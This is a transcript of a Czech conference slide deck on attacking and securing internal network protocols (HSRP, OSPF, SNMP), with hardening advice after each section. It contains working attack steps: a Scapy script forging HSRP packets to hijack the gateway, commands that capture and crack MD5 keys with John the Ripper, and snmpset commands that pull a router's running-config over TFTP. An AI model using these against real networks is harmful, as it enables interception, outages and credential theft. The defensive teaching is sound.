Zabezpečení síťových protokolů

Transkript

1 Zabezpečení síťových protokolů Michal Kostěnec CESNET, z. s. p. o

2 Obsah Úvod Význam bezpečnosti uvnitř sítě Vnitřní vs vnější Zabezpečení protokolů uvnitř sítě Krátce teorie o funkci protokolu Dostupné druhy zabezpečení Popis útoku HSRP, OSPF a SNMP Zajímavost z praxe v

3 Bezpečnost uvnitř sítě Složitější ochrana než před útoky z Internetu Povaha útoků se může lišit Přibývá L2 komunikace Různé kategorie sítě Klientské (portsecurity, DHCP snooping, DAI, IPSG, storm-control) Serverové (FW, FHRP, mgmt rozhraní) Neočekávané (nepříjemné) vlastnosti OS Síťových prvků

4 HSRP Rodina protokolů FHRP HSRP (Cisco proprietární), VRRP, GLBP Poskytují redundanci pro next-hop (def. gw) Aktivní sledování stavu HSRP routeru Pravidelné HELLO zprávy Hello 3s Hold-time 10s V případě výpadku další router s nejvyšší prioritou převezme roli gw Virtuální IP a MAC

5 HSRP fáze

6 Použití HSRP Nejčastěji v serverové podsíti Zajištění max redundance GW Bezvýpadková změna aktivního směrovače Podpora 2+ participujících směrovačů Možnost load-balancingu Méně časté v klientské síti Sítě s vysokou prioritou Spojení 2 active/active párů FW + směrovač

7 Naše síť s HSRP

8 HSRP & Cisco

9 HSRP zprávy

10 Druhy autentizace HSRP Bez autentizace Výchozí stav Autentizační řetězec cisco (viz hello paket) Plaintext autentizace Vlastně žádná změna Není autentizace, pouze jako ochrana při chybné konfiguraci MD5 autentizace Vytváří se HMAC zprávy Integrita obsahu a autenticita odesílatele

11 Útok na HSRP

12 Útok na HSRP Vysíláme pravidelně pakety s parametry pro získání pozice aktivního směrovače Cíl je vyhrazená multicastová skupina Priorita 0-255, čili 255;-) Potenciálně vyšší IP než jsou pravé směrovače MITM nebo DoS Jaký je rozdíl mezi (na co si dávat pozor) Fyzicky v lokální síti Vzdáleně na kompromitovaném stroji

13 Útok prakticky Scapy Generování, dekódování a manipulace s pakety ip = IP(src=' ', dst=' ') udp = UDP() hsrp = HSRP(group=10, priority=255, virtualip=' ', auth='vlan10!') send(ip/udp/hsrp, iface='eth0', inter=3, loop=1) >>> ip/udp/hsrp <IP frag=0 proto=udp src= dst= <UDP sport=1985 dport=1985 <HSRP priority=255 group=10 auth='vlan10!' virtualip= >>>

14 Co budeme dělat s MD5? Útok identický, jen potřebujeme klíč Online Bruteforce Offline bruteforce Nahrání komunikace na lokální síti tcpdump -i eth0 -n dst host s0 -w /tmp/hsrp.pcap Vyparsování dat pro offline bruteforcing (MagnumRipper) pcap2john.py hsrp.pcap > hsrp.john Bruteforcing (JtR) john hsrp.john

15 HSRP summary Používat MD5 autentizaci Používat dostatečne silný(dlouhý) klíč Případně použít ACL Pouze vyjmenované HSRP směrovače ip access-list extended ACL_HSRP_ROUTER permit udp host eq 1985 any eq 1985 deny udp any eq 1985 any eq 1985 log permit ip any any

16 OSPFv2 (dále OSPF) Open Shortest Path First Nejpoužívanější dynamický směrovací protokol Hierarchické dělení sítě Oblasti (informace se vyměňují uvnitř oblasti, tzv. area) Hraniční směrovače pro výměnu zpráv mezi oblastmi Hello zprávy v krátkém intervalu (rychlá konvergence) Dijkstrův algoritmus (rychlost linky) Loadbalancing (cesty se stejnou cenou ) Autentizace

17 Druhy autentizace Shodné jako u HSRP Jen se nedělá HMAC, ale pouze MD5 klíče Draft na SHA256 HMAC Bez autentizace Výchozí stav Plaintext autentizace Vlastně žádná změna Není autentizace, pouze jako ochrana při chybné konfiguraci MD5 autentizace

18 (NE)Použití OSPF Pro páteřní sítě s rychlou konvergencí Řádově jednotky sekund dle nastavení Robustní díky hierarchii Náročnější na CPU Klientské sítě Není důvod, spíše chyba v konfiguraci Serverové sítě Virtuální směrovače (CSR 1000V) Anycast DNS,

19 Naše síť s OSPF

20 OSPF podmínky sousedství Musí se shodovat Síť a maska na lince Oblast (Area) + její typ Hello + Dead časy MTU (kontrolu lze vypnout) Autentizace Nesmí se shodovat Router-id (označení směrovače)

21 Route injection Navázání sousedsví Problém při autentizaci MITM nebo DoS Injektování routy Lokální síť (příliš složité) PROČ? Vzdálená síť/ip Např Quagga Int Lo1 Ip address Router ospf 1 Network area

22 Kde zjistíme potřebné parametry

23 Ilustrace útoku na OSPF

24 Útok na OSPF prakticky Uvažujme kompromitaci serveru Do sítě jsou posílány HELLO zprávy pro DNS Anycast server Zjistíme potřebné parametry pro sousedství Wireshark, tcpdump, tshark, Navážeme sousedství Injektujeme routu /0 je riskantní Nejlépe /32 Při použité autentizaci Získání dat a bruteforce

25 OSPF hello s autentizací

26 OSPF s MD5 autentizací Postup téměř identický jako u HSRP Nahrání komunikace na lokální síti tcpdump -i eth0 -n dst host s0 -w /tmp/ospf.pcap Vyparsování dat pro offline bruteforcing (ettercap > v0.8.1) ettercap -Tqr ospf.pcap > ospf.john Bruteforcing (JtR) john ospf.john

27 OSPF summary Používat MD5 autentizaci Používat dostatečne silný(dlouhý) klíč Passive-interface default No passive-interface Vlan10 Sousedé explicitně přes unicast Filtrování přijímaných prefixů ip prefix-list DNS_ANYCAST_IN seq 5 permit /32 router ospf 1 distribute-list prefix DNS_ANYCAST_IN in Vlan

28 SNMP Simple Network Management Protocol Základní protokol pro dohled/správu sítě Základní pojmy Manager (Server) GET/SET požadavky (RO vs RW community) Agent (SW na zařízení) Community GET/SET odpovědi TRAPy (nevyžádané SNMP zprávy) Lze chápat jako heslo (pouze v1 - v2c) Hierarchický jménný systém OID Pro snadnější práci MIB tabulky

29 MIB tabulka

30 SNMP II. Verze 1 původní verze Nepodporuje 64bit čítače Verze 2c Verze 3 Nové metody pro čtení dat Autentizace jen dle community Nejpoužívanější v součastnosti Autentizace a šifrování

31 Cisco konfigurace SNMP snmp-server community $emestralk4. RO snmp-server community read.write!c0mmunity RW snmp-server trap-source Loopback0 snmp-server location NTK, Velky sal - XX,XX420 snmp-server contact Michal Kostenec, kostenec@test.lab, snmp-server host webtrap snmp-server enable traps cpu threshold

32 Průzkum prostředí při RO Hledání zranitelností Neoprávněný přístup Eskalace práv DoS iso = STRING: "Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), 15.2(4)M5, RELEASE SOFTWARE (fc2) CVE An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device

33 Průzkum prostředí při RO Zjišťování topologie sítě Popis portů Vlany Připojená zařízení iso = STRING: "SWT Testovaci podsit iso = STRING: "Fa0/8" iso = INTEGER: 10 iso = INTEGER: iso = 9 iso = Hex-STRING: C 07 AC 08 iso = Hex-STRING: C 07 AC

34 Zajímavosti při RW community Možnost nastavení položky s možností zápisu Stažení konfigurace :-) Hesla, sdílená tajemství, další zajímavá konfigurace snmpset -c community -v 2c i 1 (tftp) snmpset -c community -v 2c i 4 (runningconfig) snmpset -c community -v 2c i 1 (networkfile) snmpset -c community -v 2c a (dstip) snmpset -c community -v 2c s R1-config.conf (filename) snmpset -c community -v 2c i 1 (active)

35 Stažená konfigurace enable secret 4 xpc5koyezrbdek6ef24rmwy.i8z87nnt7ervl7dxbh. username admin privilege 15 secret 5 $1$lVFH$x7vloxy4oaT9jvrNt0jGn/ aaa group server tacacs+ tac_admin server server tacacs-server key A3C560F3C067C1C archive path tftp:// /backup/sw101-config line con 0 password C2B41171D49 line vty 0 4 access-class management-access-v4 in password 0 SuperTajneHeslo.908 ip access-list standard management-access-v4 permit permit

36 Summary SNMP Nejvhodnější je v3 (autentizace, šifrování) Používá se spíše v2 Community, které nelze uhádnout hrubou silou Nepoužívat RW community, pokud není nutné Omezit přístup na vyjmenované IP rozsahy ip access-list standard management-access-v4 permit deny any log snmp-server community $emestralk4. RO management-access-v

37 Praxe 2014: Duplicitní IP Tiskárna a posléze WIN hlásí duplicitní IP Řízený přístup k síti Pouze registrovaná zařízení (DHCP) DHCP snooping, DAI, IPSG Problém na různých VLANách

38 Praxe 2014: Duplicitní IP Nová úžasná funkce Použití IP Device Tracking (IPDT) The main IPDT task is to keep track of connected hosts (association of MAC and IP address). In order to do this, it sends unicast Address Resolution Protocol (ARP) probes with a default interval of 30 seconds Web-based authentication Auth-proxy Flexible netflow Cisco TrustSec (CTS)

39 Praxe 2014: Duplicitní IP show ip device tracking all IP Device Tracking = Enabled IP Device Tracking Probe Count = 3 IP Device Tracking Probe Interval = 30 IP Device Tracking Probe Delay Interval = IP Address MAC Address Vlan Interface STATE a b.b GigabitEthernet0/1 INACTIVE

40 Dotazy???